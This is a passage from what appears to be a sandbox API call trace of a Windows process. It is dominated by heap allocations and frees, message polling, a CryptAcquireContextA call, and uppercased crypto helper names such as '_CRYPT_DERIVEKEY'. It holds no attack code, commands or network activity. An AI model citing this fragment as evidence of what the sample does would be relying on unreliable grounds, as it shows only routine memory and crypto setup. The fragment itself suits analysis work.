hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.600] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0226.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0226.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0226.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0226.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0226.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0226.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0226.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0226.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0226.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0226.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0226.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0226.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0226.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0226.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0226.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0226.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0226.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0226.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0226.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0226.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0226.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0226.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0226.610] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0226.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0226.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0226.611] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0226.611] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0226.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0226.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d28 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0226.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0226.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0226.612] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0226.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0226.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.612] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0226.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0226.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0226.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.612] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.612] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.612] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0226.613] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0226.613] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.613] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.613] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0226.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0226.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0226.613] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0226.613] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0226.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0226.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0226.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0226.615] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0226.615] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0226.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0226.616] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0226.616] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0226.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0226.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.616] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0226.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.616] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.616] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0226.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0226.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0226.617] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.617] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.617] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0226.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0226.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0226.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0226.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0226.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.617] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.660] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 